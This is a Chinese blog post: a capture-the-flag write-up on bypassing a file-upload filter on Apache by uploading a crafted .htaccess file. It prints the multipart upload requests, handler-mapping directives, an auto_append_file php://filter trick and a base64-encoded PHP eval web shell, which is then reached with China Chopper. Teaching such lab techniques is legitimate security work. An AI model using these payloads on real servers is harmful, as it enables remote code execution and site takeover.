文件上传漏洞之.htaccess文件解析漏洞

最新推荐文章于 2025-04-07 18:10:06 发布
最新推荐文章于 2025-04-07 18:10:06 发布
阅读量7.4k 收藏 32
点赞数 6
文章标签: apache php 服务器 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/125080205
版权
本文介绍了.htaccess文件的用途和功能,特别是其在Apache服务器上的配置作用,如文件类型映射、错误页面定制等。重点讲解了利用.htaccess文件上传漏洞,通过auto_append_file和php伪协议进行绕过的方法,展示了如何在上传后使得HTML文件被当作PHP解析并执行附加代码。此外,还提到了利用此漏洞的实战步骤和环境,以及相关参考链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件上传漏洞之.htaccess文件解析漏洞

文章目录

前置知识

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

  htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。
  总之,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

  需要注意,.htaccess文件的作用域为其所在目录与其所有的子目录,若是子目录也存在.htaccess文件,则会覆盖父目录的.htaccess效果。

漏洞利用

环境来源: Dest0g3 520迎新赛 WEB funny_upload

打开链接,是一个文件上传的功能。

在这里插入图片描述

尝试上传.php文件,以及进行后缀名绕过均无效,发现服务器进行了过滤。

在这里插入图片描述

这里尝试上传.htaccess文件,但是服务器对文件内容也有校验,过滤了php的标签<?
因此这里使用auto_append_file和php伪协议组合进行绕过。

首先上传.htaccess文件

Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .html
php_value auto_append_file "php://filter/convert.base64-decode/resource=a.html"

下面介绍一下上传的文件内容。

(1).htaccess参数

常见配法有以下几种:

AddHandler php5-script .jpg

AddType application/x-httpd-php .jpg

Sethandler application/x-httpd-php

Sethandler 将该目录及子目录的所有文件均映射为php文件类型。
Addhandler 使用 php5-script 处理器来解析所匹配到的文件。
AddType 将特定扩展名文件映射为php文件类型。

(2)auto_append_file参数

使用auto_prepend_file与auto_append_file在所有页面的顶部与底部require文件。

php.ini中有两项:
auto_prepend_file 在页面顶部加载文件
auto_append_file 在页面底部加载文件

使用这种方法可以不需要改动任何页面,当需要修改顶部或底部require文件时,只需要修改auto_prepend_file与auto_append_file的值即可。

在需要顶部或底部加载文件的文件夹中加入.htaccess文件,内容如下:

php_value auto_prepend_file "/home/fdipzone/header.php"
php_value auto_append_file "/home/fdipzone/footer.php"

这样在指定.htaccess的文件夹内的页面文件才会加载 /home/fdipzone/header.php/home/fdipzone/footer.php,其他页面文件不受影响。

使用.htaccess设置,比较灵活,不需要重启服务器,也不需要管理员权限,唯一缺点是目录中每个被读取和被解释的文件每次都要进行处理,而不是在启动时处理一次,所以性能会有所降低。

回到本题,上传:

在这里插入图片描述

上传成功,那其实就是说咱们实现了两个事情:
(在uploads/c47b21fcf8f0bc8b3920541abd8024fd/目录下)
1、html文件都会被当作php文件解析。
2、php文件的底部都会被加上a.html文件的内容Base64解码后的东西。

因此下一步需要再上传一个a.html文件。

Content-Disposition: form-data; name="file"; filename="a.html"
Content-Type: image/jpeg

PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+

在这里插入图片描述

访问页面,成功上传。

在这里插入图片描述

菜刀直接连即可。

在这里插入图片描述

参考链接

htaccess_百度百科

Dest0g3 520迎新赛 writeup (misc部分 + web部分)_shu天的博客-CSDN博客

.htaccess文件上传解析漏洞_mmzkyl的博客-CSDN博客_htaccess文件上传解析漏洞

PHP中auto_prepend_file与auto_append_file用法实例分析_php技巧_脚本之家

.htaccess上传漏洞解析漏洞
m0_51607644的博客
08-17 4143
写在前边 漏洞学习三步走: 1.了解漏洞原理 2.知道漏洞形成条件,复现漏洞 3.解决如何防范 .htaccess上传漏洞 .htaccess文件作用 概述来说,htaccess文件Apache服务器中的一个配置文件,它负责相关目 录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自 定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、 禁止目录列表、配置默认文档等功能。 Unix、Linux系统或者是任何版本的Apach
iwebsec靶场 文件上传漏洞通关笔记5-.htaccess过滤绕过
mooyuan的网络安全博客
04-20 1754
htaccess文件全称是超文本入口,提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。htaccess文件Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。上传.htaccess文件,来绕过黑名单。(2)如何配置使.htaccess生效。
文件上传-00截断
weixin_45711977的博客
07-18 2610
文件上传-00截断
.htaccess文件的组成、用法及作用详解
最新发布
2403_90011488的博客
04-07 641
(需要管理员级别权限修改的httpd.conf文件修改后需要重启Apach服务器)它主要用于目录级的配置,是。合理使用能大幅增强网站安全性和灵活性,但需注意性能影响和语法正确性。(Hypertext Access)是 Apache 服务器的一个。实现“固定链接”(Pretty Permalinks)功能。禁止直接列出目录内容(防止敏感文件泄露)。只允许本站引用图片,外站访问返回 403。),防止上传 Webshell 被执行。(禁止目录遍历、防 PHP 执行),可以覆盖主配置文件的设置,
.htaccess文件上传解析漏洞
mmzkyl的博客
01-04 7781
测试环境 upload-labs靶场(Pass-04)     原理 .htaccess文件Apache服务器下的一个配置文件
文件上传绕过】——解析漏洞_.htaccess文件解析漏洞
weixin_45588247的博客
07-28 3638
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞利用前提:五、原理:六、利用方式:七、`.htaccess文件`内容:八、`.htaccess文件`制作:1. 直接创建文件:2. 通过`cmd命令行`创建:九、实验过程: 一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168.100
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 1132
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
漏洞复现篇——.htaccess文件解析漏洞
爱国小白帽
02-17 9051
实验环境: PHPstudy php5.6以下不带nts的版本 upload-labs-master上传漏洞靶场 服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件 原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或...
文件上传漏洞——.htaccess.user.ini配置文件的应用
ximo的博客
02-15 1606
. htaccess配置文件 htaccess文件Apache服务器中的一个配置文件,只对该文件所在的目录下的文件起作用。 在htaccess配置文件下有这样一条配置: AddType application/x-httpd-php .php .jpg 这条配置的意思是,php和jpg格式的文件,都会被当做php文件解析;我们可以在追加其他的后缀名,都将其解析php文件;但是这样未免有些繁琐。 所以还有另外一条配置: SetHandler application/x-httpd-php 这条
58.网络安全渗透测试—[文件上传篇8] —[. htaccess重写解析漏洞-突破上传]
qwsn
08-08 2075
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、. htaccess重写解析漏洞 1、重写解析漏洞的原理: 2、重写解析漏洞的利用:
文件上传.htaccess.user.ini
m0_46587008的博客
05-20 1711
文章目录前言一、基本描述二、配置与使用三、实战1、总结 前言 提示:最近写文件上传的题目经常碰到关于.htaccess.user.ini文件的使用问题,我不了解Apachephp配置文件,所以想借着这次机会好好着重了解一些这两个配置文件 一、基本描述 1、.htaccess。 百科对于.htaccess的解读是:htaccess文件Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/
文件上传漏洞.htaccess
不好好做安全的运维足球狗
03-12 6032
0x00 前言 .htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htacce...
文件上传漏洞08】.htaccess攻击实验(基于upload-labs-4靶场)
Fighting_hawk的博客
03-02 4527
1. 当存在文件上传漏洞时,只要恶意代码没有被过滤,就存在被执行的危险。 2. 掌握修改.htaccess以改变各种文件执行程序的方法。
iwebsec靶场文件上传漏洞-.htaccess文件上传
qq_56041380的博客
03-28 1481
.htaccess文件上传是利用.htaccess文件Web服务器进行配置的功能,实现将扩展名为.jpg、.png等的文件当做PHP文件解析的过程
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9620
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
1-Web安全——文件上传漏洞
网络安全
08-20 4416
1. 上传文件漏洞原理 现在大部分web应用程序都有上传文件的功能,例如个人博客上传各种文件和图片,招聘网站上传doc文件格式的简历等等。只要web应用程序有上传文件的功能,就可能会存在上传文件漏洞。 为什么会有上传文件漏洞? 一般用户在上传文件时,如果web应用程序的代码没有对上传的文件进行严格的校验和过滤时,容易出现允许上传任意文件的情况,然后恶意攻击者利用这一点上传恶意脚本文件(aspx,php,jsp等文件)到服务器,从而获取网站的管理员权限,对服务器造成巨大威胁,这个恶意文件则被称为webs
文件上传漏洞.htaccess文件
weixin_65279640的博客
04-17 1139
提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有。简言之,.htaccess就是Apache服务器上的一个可以实现特殊功能的配置文件。http.conf文件中设置了 AllowOverried All ,才能使用.htaccess文件。通过htaccess文件,可以帮我们实现:网页。想要利用好.htaccess文件,我们就需要先了解一下什么是htaccess。,可以把特定文件转化成php执行的特性来进行文件上传漏洞利用。
.htaccess文件解析漏洞
cxrpty的博客
02-17 4106
一、.htaccess文件文件提供了针对目录改便配置的方法。即在一个特定的文档目录中放置一个包含一个或者多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 二、apache解析漏洞 ...
漏洞知识点《.htaccess 解析漏洞深度解析
qq_46143339的博客
03-17 937
htaccess
.htaccess文件上传漏洞
12-31
### 关于 `.htaccess` 文件上传漏洞安全性 #### 什么是`.htaccess`文件上传漏洞? 当Web应用程序允许用户上传文件服务器,并且这些文件能够被解释执行时,可能会发生`.htaccess`文件上传漏洞。如果攻击者成功上传恶意编写的`.htaccess`文件,则可以修改Apache配置设置,进而控制访问权限、重定向流量或绕过其他安全措施。 为了有效防范此类风险,建议采取以下几种策略: - **严格限制文件上传路径**:确保只有特定目录才接受来自用户的文件提交操作;同时,在存储位置方面应远离web根目录[^1]。 - **验证并过滤上传的内容类型**:通过白名单机制限定可接收的MIME类型以及扩展名列表,拒绝任何可疑格式的文档进入系统内部[^3]。 - **禁用危险指令解析**:编辑全局级别的httpd.conf或其他等效配置文件中的选项,关闭不必要的模块和服务端处理功能,比如PHP短标签支持等[^4]。 - **定期扫描已存在的资源库**:部署自动化工具持续监控项目结构内的所有组件是否存在潜在威胁,及时更新至最新稳定版本以修复官方公布过的缺陷. 另外值得注意的是,虽然适当调整`.htaccess`本身有助于增强局部区域的安全防护等级,但从长远来看,还是应该优先考虑采用更高级别的防御手段——即构建稳固的应用程序防火墙(WAF),其具备识别异常行为模式的能力,并能依据预设规则自动拦截非法请求,从而大大降低遭受XSS和SQL注入的风险水平[^2]。 最后,启用站点范围内的SSL/TLS协议对于保障数据传输过程中的私密性和完整性同样至关重要。这不仅限于保护敏感信息不被窃听篡改,而且还能防止中间人攻击的发生[^5]。 ```bash # 设置严格的文件权限 chmod 644 /path/to/your/.htaccess ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

2ha0yuk7on.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值